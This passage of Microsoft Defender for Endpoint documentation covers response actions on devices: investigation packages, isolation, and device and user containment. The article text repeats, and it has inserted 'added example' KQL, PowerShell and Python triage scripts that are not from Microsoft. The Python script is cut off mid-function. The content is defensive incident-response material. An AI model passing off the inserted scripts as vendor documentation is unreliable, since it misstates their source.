queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

) Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.

Initiate Automated Investigation
You can start a new general purpose automated investigation on the device if needed.
While an investigation is running, any other alert generated from the device will be
added to an ongoing Automated investigation until that investigation is completed. In
addition, if the same threat is seen on other devices, those devices are added to the
investigation.

For more information on automated investigations, see Overview of Automated
investigations.

Initiate live response session
Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic
data, run scripts, send suspicious entities for analysis, remediate threats, and proactively
hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live
response.

Collect investigation package from devices
As part of the investigation or response process, you can collect an investigation
package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top
of the device page.

2. Specify in the text box why you want to perform this action. Select Confirm.

3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the
device page.

2. Add comments and select Confirm.

3. Select Action center from the response actions section of the device page.

4. Select Package collection package available to download the collection
package.

For Windows devices, the package contains the following folders:

Autoruns: Contains a set of files that each represent the content of the registry
of a known auto start entry point (ASEP) to help identify the attacker's
persistence on the device.
NOTE: If the registry key is not found, the file will contain the following
message: "ERROR: The system was unable to find the specified registry key or
value."

Installed programs: This .CSV file contains the list of installed programs that
can help identify what is currently installed on the device. For more
information, see Win32_Product class.

Network connections: This folder contains a set of data points related to the
connectivity information that can help in identifying connectivity to suspicious
URLs, attacker's command and control (C&C) infrastructure, any lateral movement,
or remote connections.
    ActiveNetConnections.txt: Displays protocol statistics and current TCP/IP
    network connections. Provides the ability to look for suspicious
    connectivity made by a process.
    Arp.txt: Displays the current address resolution protocol (ARP) cache
    tables for all interfaces. The ARP cache can reveal other hosts on a
    network that have been compromised or suspicious systems on the network
    that might have been used to run an internal attack.
    DnsCache.txt: Displays the contents of the DNS client resolver cache, which
    includes both entries preloaded from the local Hosts file and any recently
    obtained resource records for name queries resolved by the computer. This
    can help in identifying suspicious connections.
    IpConfig.txt: Displays the full TCP/IP configuration for all adapters.
    Adapters can represent physical interfaces, such as installed network
    adapters, or logical interfaces, such as dial-up connections.
    FirewallExecutionLog.txt and pfirewall.log
    NOTE: The pfirewall.log file must exist in
    %windir%\system32\logfiles\firewall\pfirewall.log, so it will be included
    in the investigation package. For more information on creating the
    firewall log file, see Configure the Windows Defender Firewall with
    Advanced Security Log.

Prefetch files: Windows Prefetch files are designed to speed up the application
startup process. They can be used to track all the files recently used in the
system and find traces for applications that might have been deleted but can
still be found in the prefetch file list.
    Prefetch folder: Contains a copy of the prefetch files from
    %SystemRoot%\Prefetch. NOTE: It is suggested to download a prefetch file
    viewer to view the prefetch files.
    PrefetchFilesList.txt: Contains the list of all the copied files that can
    be used to track if there were any copy failures to the prefetch folder.

Processes: Contains a .CSV file listing the running processes and provides the
ability to identify current processes running on the device. This can be useful
when identifying a suspicious process and its state.

Scheduled tasks: Contains a .CSV file listing the scheduled tasks, which can be
used to identify routines performed automatically on a chosen device to look for
suspicious code that was set to run automatically.

Security event log: Contains the security event log, which contains records of
login or logout activity, or other security-related events specified by the
system's audit policy.
NOTE: Open the event log file using Event Viewer.

Services: Contains a .CSV file that lists services and their states.

Windows Server Message Block (SMB) sessions: Lists shared access to files,
printers, and serial ports and miscellaneous communications between nodes on a
network. This can help identify data exfiltration or lateral movement.
Contains files for SMBInboundSessions and SMBOutboundSession.
NOTE: If there are no sessions (inbound or outbound), you'll get a text file
that tells you that there are no SMB sessions found.

System Information: Contains a SystemInformation.txt file that lists system
information such as OS version and network cards.

Temp Directories: Contains a set of text files that lists the files located in
%Temp% for every user in the system. This can help to track suspicious files
that an attacker may have dropped on the system.
NOTE: If the file contains the following message: "The system cannot find the
path specified", it means that there is no temp directory for this user, and
might be because the user didn't log in to the system.

Users and Groups: Provides a list of files that each represent a group and its
members.

WdSupportLogs: Provides the MpCmdRunLog.txt and MPSupportFiles.cab.
NOTE: This folder will only be created on Windows 10, version 1709 or later
with the February 2020 update rollup or more recent installed:
    Win10 1709 (RS3) Build 16299.1717: KB4537816
    Win10 1803 (RS4) Build 17134.1345: KB4537795
    Win10 1809 (RS5) Build 17763.1075: KB4537818
    Win10 1903/1909 (19h1/19h2) Builds 18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls: This file is a summary of the investigation package
collection. It contains the list of data points, the command used to extract
the data, the execution status, and the error code if there is a failure. You
can use this report to track if the package includes all the expected data and
identify if there were any errors.
The collection packages for macOS and Linux devices contain the following:

Applications
    macOS: A list of all installed applications
    Linux: Not applicable

Disk volume
    macOS: Amount of free space; list of all mounted disk volumes; list of all partitions
    Linux: Amount of free space; list of all mounted disk volumes; list of all partitions

File
    macOS: A list of all open files with the corresponding processes using these files
    Linux: A list of all open files with the corresponding processes using these files

History
    macOS: Shell history
    Linux: Not applicable

Kernel modules
    macOS: All loaded modules
    Linux: Not applicable

Network connections
    macOS: Active connections; active listening connections; ARP table; firewall rules;
    interface configuration; proxy settings; VPN settings
    Linux: Active connections; active listening connections; ARP table; firewall rules;
    IP list; proxy settings

Processes
    macOS: A list of all running processes
    Linux: A list of all running processes

Services and scheduled tasks
    macOS: Certificates; configuration profiles; hardware information
    Linux: CPU details; hardware information; operating system information

System security information
    macOS: Extensible Firmware Interface (EFI) integrity information; firewall status;
    Malware Removal Tool (MRT) information; System Integrity Protection (SIP) status
    Linux: Not applicable

Users and groups
    macOS: Login history; sudoers
    Linux: Login history; sudoers

Run Microsoft Defender Antivirus scan on devices
As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.

) Important

This action is supported for macOS and Linux for client version 101.98.84 and
above. You can also use live response to run the action. For more information
on live response, see Investigate entities on devices using live response.
A Microsoft Defender Antivirus scan can run alongside other antivirus
solutions, whether Microsoft Defender Antivirus is the active antivirus solution
or not. Microsoft Defender Antivirus can be in Passive mode. For more
information, see Microsoft Defender Antivirus compatibility.

Once you have selected Run antivirus scan, select the scan type that you'd like to run
(quick or full) and add a comment before confirming the scan.

The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.

7 Note

When triggering a scan using Defender for Endpoint response action, Microsoft
Defender antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU
impact of the scan. If ScanAvgCPULoadFactor is not configured, the default value is
a limit of 50% maximum CPU load during a scan. For more information, see
configure-advanced-scan-types-microsoft-defender-antivirus.

Restrict app execution

In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.

) Important

This action is available for devices on Windows 10, version 1709 or later,
Windows 11, and Windows Server 2019 or later.
This feature is available if your organization uses Microsoft Defender Antivirus.
This action needs to meet the Windows Defender Application Control code
integrity policy formats and signing requirements. For more information, see
Code integrity policy formats and signing.

To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.

7 Note

You'll be able to reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment
and select Confirm. The Action center will show the action details and the device
timeline will include a new event.

Notification on device user
When an app is restricted, the following notification is displayed to inform the user that
an app is being restricted from running:

7 Note

The notification is not available on Windows Server 2016 and Windows Server 2012
R2.

Isolate devices from the network
Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.

) Important

Isolating devices from the network is supported for macOS for client version
101.98.84 and above. You can also use live response to run the action. For
more information on live response, see Investigate entities on devices using
live response.
Full isolation is available for devices running Windows 11, Windows 10,
version 1703 or later, Windows Server 2022, Windows Server 2019, Windows
Server 2016 and Windows Server 2012 R2.
You can use the device isolation capability on all supported Microsoft
Defender for Endpoint on Linux versions listed in System requirements. Ensure that
the following prerequisites are enabled: iptables, ip6tables, and a Linux kernel
with CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, and CONFIG_IP_NF_MATCH_OWNER.
Selective isolation is available for devices running Windows 10, version 1709
or later, and Windows 11.
When isolating a device, only certain processes and destinations are allowed.
Therefore, devices that are behind a full VPN tunnel won't be able to reach
the Microsoft Defender for Endpoint cloud service after the device is isolated.
We recommend using a split-tunneling VPN for Microsoft Defender for
Endpoint and Microsoft Defender Antivirus cloud-based protection-related
traffic.
The feature supports VPN connections.
You must have at least one of the following role permissions: 'Active remediation
actions'. For more information, see Create and manage roles.
You must have access to the device based on the device group settings. For
more information, see Create and manage device groups.
Exclusions are not supported for macOS and Linux isolation.
An isolated device is removed from isolation when an administrator modifies
or adds a new iptables rule on the isolated device.
Isolating a server running on Microsoft Hyper-V blocks network traffic to all
child virtual machines of the server.

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.

On Windows 10, version 1709 or later, you'll have more control over the network
isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for
Business connectivity (also known as 'Selective Isolation').

7 Note

You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select
Confirm. The Action center will show the action details and the device timeline will
include a new event.

7 Note

The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate to the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.

Forcibly release device from isolation
The device isolation feature is an invaluable tool for safeguarding devices against
external threats. However, there are instances when isolated devices become
unresponsive. There's a downloadable script for these instances that you can run to
forcibly release devices from isolation. The script is available through a link in the UI.

7 Note

Admins and users with the "Manage security settings in Security Center"
permission can forcibly release devices from isolation.
The script is valid for the specific device only.
The script will expire in three days.

To forcibly release device from isolation:

1. On the device page, select Download script to force-release a device from
isolation from the action menu.
2. On the right-hand side wizard, select Download script.

Minimum requirements
The minimum requirements for 'forcibly release device from isolation' feature are:

Supports only Windows.
The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB5023773
Windows 11 version 21H2, all editions with KB5023774
Windows 11 version 22H2, all editions with KB5023778

Notification on device user
When a device is being isolated, the following notification is displayed to inform the
user that the device is being isolated from the network:

7 Note

The notification is not available on non-Windows platforms.

Contain devices from the network
When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
contain a device any Microsoft Defender for Endpoint onboarded device will block
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.

7 Note

Blocking incoming and outgoing communication with a 'contained' device is
supported on onboarded Microsoft Defender for Endpoint Windows 10 and
Windows Server 2019+ devices.

How to contain a device
1. Go to the Device inventory page and select the device to contain.

2. Select Contain device from the actions menu in the device flyout.

3. On the contain device popup, type a comment, and select Confirm.


Contain a device from the device page
A device can also be contained from the device page by selecting Contain device from
the action bar:

7 Note
It can take up to 5 minutes for the details about a newly contained device to reach
Microsoft Defender for Endpoint onboarded devices.

) Important

If a contained device changes its IP address, then all Microsoft Defender for
Endpoint onboarded devices will recognize this and start blocking
communications with the new IP address. The original IP address will no
longer be blocked (It may take up to 5 mins to see these changes).
In cases where the contained device's IP is used by another device on the
network, there will be a warning while containing the device, with a link to
advanced hunting (with a pre-populated query). This will provide visibility to
the other devices using the same IP to help you make a conscious decision if
you'd like to continue with containing the device.
In cases where the contained device is a network device, a warning will appear
with a message that this may cause network connectivity issues (for example,
containing a router that is acting as a default gateway). At this point, you'll be
able to choose whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.
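
The shared-IP warning above matters because containment is enforced by address: every onboarded device blocks whatever currently holds the contained device's IP. You can make the same check yourself before containing a device, using the DeviceNetworkInfo table that records the addresses each onboarded device reports. The following Kusto query is an added example and is not the portal's pre-populated query; the IP address is a placeholder from the RFC 5737 documentation range that you replace with the address of the device you intend to contain.

```kusto
// Added example (not from the article): which onboarded devices have recently
// reported a given IP address. More than one row means the address is shared
// and containing by that address would also block the other device(s).
let ContainedIP = "192.0.2.25";  // placeholder from the RFC 5737 documentation range; replace it
DeviceNetworkInfo
| where Timestamp > ago(1d)
// IPAddresses is a JSON array of {IPAddress, SubnetPrefix, AddressType}; expand one row per address
| mv-expand Address = parse_json(IPAddresses)
| extend IP = tostring(Address.IPAddress)
| where IP == ContainedIP
| summarize LastReported = max(Timestamp),
            Adapters     = make_set(NetworkAdapterName),
            MacAddresses = make_set(MacAddress)
          by DeviceId, DeviceName
| order by LastReported desc
```

DeviceNetworkInfo only covers onboarded devices, so an unmanaged device (the usual target of containment) will not appear here; what the query shows is whether a managed device would be caught by the same block. Two different MAC addresses against one IP over the last day is the sign of a reused or conflicting address.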

Stop containing a device


You'll be able to stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.

2. Select Release from containment from the action menu. This action will restore
this device's connection to the network.

Contain user from the network
When an identity in your network might be compromised, you must prevent that
identity from accessing the network and different endpoints. Defender for Endpoint can
"contain" an identity, blocking it from access and helping prevent attacks, specifically
ransomware. When an identity is contained, any supported Microsoft Defender for
Endpoint onboarded device will block incoming traffic in specific protocols related to
attacks (network logons, RPC, SMB, RDP) while enabling legitimate traffic. This action
can significantly help to reduce the impact of an attack. When an identity is contained,
security operations analysts have extra time to locate, identify and remediate the threat
to the compromised identity.

7 Note

Blocking incoming communication with a "contained" user is supported on
onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense
version 8740 and higher), Windows Server 2019+ devices, and Windows Servers
2012R2 and 2016 with the modern agent.

How to contain a user
Currently, containing users is only available automatically by using automatic attack
disruption. When Microsoft detects a user as being compromised a "Contain User"
policy is automatically set.

View the contain user actions
After a user is contained, you can view the action in the History view of the Action
Center. Here, you can see when the action occurred, and which users in your
organization were contained:

Furthermore, after an identity is considered "contained", that user will be blocked by
Defender for Endpoint and cannot perform any malicious lateral movement or remote
encryption on or to any supported Defender for Endpoint onboarded device. These
blocks will show up as alerts to help you quickly see the devices the compromised user
attempted to access and potential attack techniques:

Undo contain user actions
You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action Center. In the side pane select Undo
2. Select the user from either the user inventory, Incident page side pane or alert side
pane and select Undo

This action will restore this user's connection to the network.

Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the blocked
actions by the compromised user. In the Device timeline view, you can see information
about specific events, including protocol and interface granularity, and the relevant
MITRE technique associated with them.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the individual blocking events related to Contain User in your tenant, dive deeper into
the context of each block, and extract the entities and techniques associated with those
events.
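As an added example (not part of the Microsoft article), the following PowerShell builds the Advanced Hunting query described above, runs it through the Defender for Endpoint advanced hunting API, and summarizes the block events per identity and device so an analyst can see which contained account kept reaching for which hosts. It assumes a bearer token with the AdvancedQuery.Read permission, the documented advanced hunting endpoint, and the standard DeviceEvents column names; the sample rows and their ActionType values are constructed placeholders, not real event names. The KQL in New-ContainUserQuery can also be pasted directly into the Advanced Hunting page.

```powershell
# Added example (not from the Microsoft article): pull the Contain User block events the
# article describes out of DeviceEvents and summarize them per identity and device.
# Assumptions (not stated on the page): $Token is an OAuth bearer token for the Defender
# for Endpoint API with the AdvancedQuery.Read permission; $HuntingApi is the documented
# advanced hunting endpoint; the DeviceEvents column names are the standard schema ones.

$HuntingApi = 'https://api.securitycenter.microsoft.com/api/advancedqueries/run'

function New-ContainUserQuery {
    # Builds the KQL. The same text can be pasted into the Advanced Hunting page directly.
    param([int]$LookbackDays = 7)
    @"
DeviceEvents
| where Timestamp > ago(${LookbackDays}d)
| where ActionType startswith "Contain"
| project Timestamp, DeviceName, ActionType, AccountDomain, AccountName,
          LocalIP, LocalPort, RemoteIP, RemotePort, AdditionalFields
| order by Timestamp desc
"@
}

function Invoke-ContainUserHunt {
    # Runs the query through the API and returns the result rows.
    param(
        [Parameter(Mandatory)][string]$Token,
        [int]$LookbackDays = 7
    )
    $body = @{ Query = (New-ContainUserQuery -LookbackDays $LookbackDays) } | ConvertTo-Json
    $response = Invoke-RestMethod -Method Post -Uri $HuntingApi `
        -Headers @{ Authorization = "Bearer $Token" } `
        -ContentType 'application/json' -Body $body
    $response.Results
}

function Get-ContainUserSummary {
    # Collapses raw block events into one row per (account, device, block type), so an
    # analyst sees which contained identity kept hitting which hosts, how often, and from where.
    param([Parameter(Mandatory)][object[]]$Events)
    $Events |
        Group-Object -Property AccountName, DeviceName, ActionType |
        ForEach-Object {
            # ISO-8601 timestamps sort correctly as strings, which is how the API returns them.
            $sorted = @($_.Group | Sort-Object -Property Timestamp)
            [pscustomobject]@{
                AccountName = $sorted[0].AccountName
                DeviceName  = $sorted[0].DeviceName
                ActionType  = $sorted[0].ActionType
                Blocks      = $sorted.Count
                FirstSeen   = $sorted[0].Timestamp
                LastSeen    = $sorted[-1].Timestamp
                RemoteIPs   = (($sorted.RemoteIP | Sort-Object -Unique) -join ', ')
            }
        } |
        Sort-Object -Property Blocks -Descending
}

# Constructed sample rows in the shape the API returns, so the summary can be tried
# offline. The ActionType values are placeholders; real ones start with "Contain" and are
# whatever your tenant's DeviceEvents table shows.
$SampleEvents = @(
    [pscustomobject]@{ Timestamp='2024-01-10T09:14:02Z'; DeviceName='fs01.contoso.example';  ActionType='ContainSampleSmbBlock'; AccountDomain='CONTOSO'; AccountName='jdoe'; RemoteIP='10.0.5.21'; RemotePort=445 }
    [pscustomobject]@{ Timestamp='2024-01-10T09:14:09Z'; DeviceName='fs01.contoso.example';  ActionType='ContainSampleSmbBlock'; AccountDomain='CONTOSO'; AccountName='jdoe'; RemoteIP='10.0.5.21'; RemotePort=445 }
    [pscustomobject]@{ Timestamp='2024-01-10T09:15:40Z'; DeviceName='app02.contoso.example'; ActionType='ContainSampleRdpBlock'; AccountDomain='CONTOSO'; AccountName='jdoe'; RemoteIP='10.0.5.21'; RemotePort=3389 }
)

Get-ContainUserSummary -Events $SampleEvents | Format-Table -AutoSize
# Live run: Get-ContainUserSummary -Events (Invoke-ContainUserHunt -Token $Token -LookbackDays 7)
```

The RemoteIPs column is the quickest pivot: a single source address appearing across many devices is the foothold the contained identity is operating from, which is where the device timeline and the device containment action described later in this article come in.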

Consult a threat expert

You can consult a Microsoft threat expert for more insights regarding a potentially
compromised device or already compromised ones. Microsoft Threat Experts can be
engaged directly from within Microsoft Defender XDR for a timely and accurate
response. Experts provide insights not only on a potentially compromised device, but
also to help you understand complex threats and the targeted attack notifications you
receive, and to give you more information about alerts or the threat intelligence context
that you see on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file.
You'll be able to view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, for example, submission date/time, submitting
user, and whether the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1
Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender for Business

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Quickly respond to detected attacks by isolating devices or collecting an investigation
package. After taking action on devices, you can check activity details in the Action
center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

Run antivirus scan
Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file

Microsoft Defender for Business does not include the "Stop and quarantine a file"
action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the
response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.

Initiate Automated Investigation

You can start a new general purpose automated investigation on the device if needed.
While an investigation is running, any other alert generated from the device will be
added to an ongoing Automated investigation until that investigation is completed. In
addition, if the same threat is seen on other devices, those devices are added to the
investigation.

For more information on automated investigations, see Overview of Automated
investigations.

Initiate live response session

Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic
data, run scripts, send suspicious entities for analysis, remediate threats, and proactively
hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live
response.

Collect investigation package from devices

As part of the investigation or response process, you can collect an investigation
package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top
of the device page.

2. Specify in the text box why you want to perform this action. Select Confirm.

3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the
device page.

2. Add comments and select Confirm.

3. Select Action center from the response actions section of the device page.

4. Select Package collection package available to download the collection
package.

For Windows devices, the package contains the following folders:

Folder / Description

Autoruns
Contains a set of files that each represent the content of the registry of a known
auto start entry point (ASEP) to help identify attacker persistence on the device.
NOTE: If the registry key is not found, the file will contain the following message:
"ERROR: The system was unable to find the specified registry key or value."

Installed programs
This .CSV file contains the list of installed programs that can help identify what is
currently installed on the device. For more information, see Win32_Product class.

Network connections
This folder contains a set of data points related to the connectivity information that
can help in identifying connectivity to suspicious URLs, attacker command and control
(C&C) infrastructure, any lateral movement, or remote connections.
ActiveNetConnections.txt: Displays protocol statistics and current TCP/IP network
connections. Provides the ability to look for suspicious connectivity made by a process.
Arp.txt: Displays the current address resolution protocol (ARP) cache tables for all
interfaces. The ARP cache can reveal other hosts on a network that have been
compromised or suspicious systems on the network that might have been used to run an
internal attack.
DnsCache.txt: Displays the contents of the DNS client resolver cache, which includes
both entries preloaded from the local Hosts file and any recently obtained resource
records for name queries resolved by the computer. This can help in identifying
suspicious connections.
IpConfig.txt: Displays the full TCP/IP configuration for all adapters. Adapters can
represent physical interfaces, such as installed network adapters, or logical interfaces,
such as dial-up connections.
FirewallExecutionLog.txt and pfirewall.log
NOTE: The pfirewall.log file must exist in
%windir%\system32\logfiles\firewall\pfirewall.log for it to be included in the
investigation package. For more information on creating the firewall log file, see
Configure the Windows Defender Firewall with Advanced Security Log.

Prefetch files
Windows Prefetch files are designed to speed up the application startup process. They
can be used to track all the files recently used in the system and find traces for
applications that might have been deleted but can still be found in the prefetch file list.
Prefetch folder: Contains a copy of the prefetch files from %SystemRoot%\Prefetch.
NOTE: It is suggested to download a prefetch file viewer to view the prefetch files.
PrefetchFilesList.txt: Contains the list of all the copied files that can be used to
track if there were any copy failures to the prefetch folder.

Processes
Contains a .CSV file listing the running processes and provides the ability to identify
current processes running on the device. This can be useful when identifying a
suspicious process and its state.

Scheduled tasks
Contains a .CSV file listing the scheduled tasks, which can be used to identify routines
performed automatically on a chosen device to look for suspicious code that was set to
run automatically.

Security event log
Contains the security event log, which contains records of login or logout activity, or
other security-related events specified by the system's audit policy.
NOTE: Open the event log file using Event Viewer.

Services
Contains a .CSV file that lists services and their states.

Windows Server Message Block (SMB) sessions
Lists shared access to files, printers, and serial ports and miscellaneous
communications between nodes on a network. This can help identify data exfiltration or
lateral movement.
Contains files for SMBInboundSessions and SMBOutboundSession.
NOTE: If there are no sessions (inbound or outbound), you'll get a text file that tells
you that there are no SMB sessions found.

System Information
Contains a SystemInformation.txt file that lists system information such as OS version
and network cards.

Temp Directories
Contains a set of text files that list the files located in %Temp% for every user in the
system. This can help to track suspicious files that an attacker may have dropped on
the system.
NOTE: If the file contains the following message: "The system cannot find the path
specified", it means that there is no temp directory for this user, which might be
because the user didn't log in to the system.

Users and Groups
Provides a list of files that each represent a group and its members.

WdSupportLogs
Provides the MpCmdRunLog.txt and MPSupportFiles.cab.
NOTE: This folder will only be created on Windows 10, version 1709 or later with the
February 2020 update rollup or more recent installed:
Win10 1709 (RS3) Build 16299.1717: KB4537816
Win10 1803 (RS4) Build 17134.1345: KB4537795
Win10 1809 (RS5) Build 17763.1075: KB4537818
Win10 1903/1909 (19h1/19h2) Builds 18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls
This file is a summary of the investigation package collection. It contains the list of
data points, the command used to extract the data, the execution status, and the error
code if there is a failure. You can use this report to track whether the package includes
all the expected data and identify whether there were any errors.

The collection packages for macOS and Linux devices contain the following:

Object: Applications
macOS: A list of all installed applications
Linux: Not applicable

Object: Disk volume
macOS: Amount of free space; list of all mounted disk volumes; list of all partitions
Linux: Amount of free space; list of all mounted disk volumes; list of all partitions

Object: File
macOS: A list of all open files with the corresponding processes using these files
Linux: A list of all open files with the corresponding processes using these files

Object: History
macOS: Shell history
Linux: Not applicable

Object: Kernel modules
macOS: All loaded modules
Linux: Not applicable

Object: Network connections
macOS: Active connections; active listening connections; ARP table; firewall rules;
interface configuration; proxy settings; VPN settings
Linux: Active connections; active listening connections; ARP table; firewall rules;
IP list; proxy settings

Object: Processes
macOS: A list of all running processes
Linux: A list of all running processes

Object: Services and scheduled tasks
macOS: Certificates; configuration profiles; hardware information
Linux: CPU details; hardware information; operating system information

Object: System security information
macOS: Extensible Firmware Interface (EFI) integrity information; firewall status;
Malware Removal Tool (MRT) information; System Integrity Protection (SIP) status
Linux: Not applicable

Object: Users and groups
macOS: Login history; sudoers
Linux: Login history; sudoers
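The Windows package described above consists of plain text files, so a first triage pass can be scripted. The following Python is an added example written for this page, not a Microsoft tool: it flags Autoruns dumps whose ASEP key was absent (using the exact "ERROR:" message from the table), parses ActiveNetConnections.txt to list established sessions to addresses outside the internal ranges, and parses pfirewall.log to count dropped inbound packets per source address. The file layouts are assumptions the page does not state: ActiveNetConnections.txt is read as `netstat -ano` output and pfirewall.log as a W3C-style log whose `#Fields:` header names the columns. The sample file contents are constructed.

```python
# Added example, not part of the Microsoft documentation: offline triage of a few text
# files from a Windows investigation package. Assumed layouts (the page does not state
# them): ActiveNetConnections.txt is read as `netstat -ano` output and pfirewall.log as
# a W3C-style log whose `#Fields:` header names the columns.
from __future__ import annotations
import ipaddress
from dataclasses import dataclass

# Exact message an Autoruns dump carries when the ASEP key did not exist (from the docs).
ASEP_MISSING = "ERROR: The system was unable to find the specified registry key or value."
# Ranges treated as inside the network. Documentation ranges such as 203.0.113.0/24 are
# deliberately not listed (ipaddress.is_private would treat them as private).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7")]

def autoruns_present(files: dict[str, str]) -> dict[str, bool]:
    """True per Autoruns file whose ASEP key existed; False means that auto-start
    location was empty on the device, so the file holds no entries to review."""
    return {name: ASEP_MISSING not in body for name, body in files.items()}

@dataclass(frozen=True)
class Connection:
    proto: str
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    state: str  # empty for UDP rows, which have no state column
    pid: int

def _split_endpoint(endpoint: str) -> tuple[str, int]:
    """'10.0.0.5:49713' -> ('10.0.0.5', 49713); '[::]:445' -> ('::', 445); '*:*' -> ('*', 0)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else 0)

def parse_active_connections(text: str) -> list[Connection]:
    """Parse netstat -ano style rows; banner, header and blank lines are skipped."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        state = parts[3] if parts[0] == "TCP" else ""
        lip, lport = _split_endpoint(parts[1])
        rip, rport = _split_endpoint(parts[2])
        conns.append(Connection(parts[0], lip, lport, rip, rport, state, int(parts[-1])))
    return conns

def is_internal(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:  # '*' and similar placeholders
        return True
    return any(addr in net for net in INTERNAL_NETS)

def external_established(conns: list[Connection]) -> list[Connection]:
    """ESTABLISHED TCP sessions to non-internal addresses: the rows to compare against
    command-and-control indicators first, joined by PID to the Processes .CSV."""
    return [c for c in conns if c.state == "ESTABLISHED" and not is_internal(c.remote_ip)]

def parse_pfirewall_log(text: str) -> list[dict[str, str]]:
    """Parse pfirewall.log rows into dicts keyed by the log's own '#Fields:' names."""
    fields: list[str] = []
    rows = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif fields and line.strip() and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def inbound_drops_by_source(rows: list[dict[str, str]]) -> dict[str, int]:
    """Dropped inbound packets per source address; one source hitting several ports in
    a short window is the usual signature of a scan against the device."""
    counts: dict[str, int] = {}
    for r in rows:
        if r.get("action") == "DROP" and r.get("path") == "RECEIVE":
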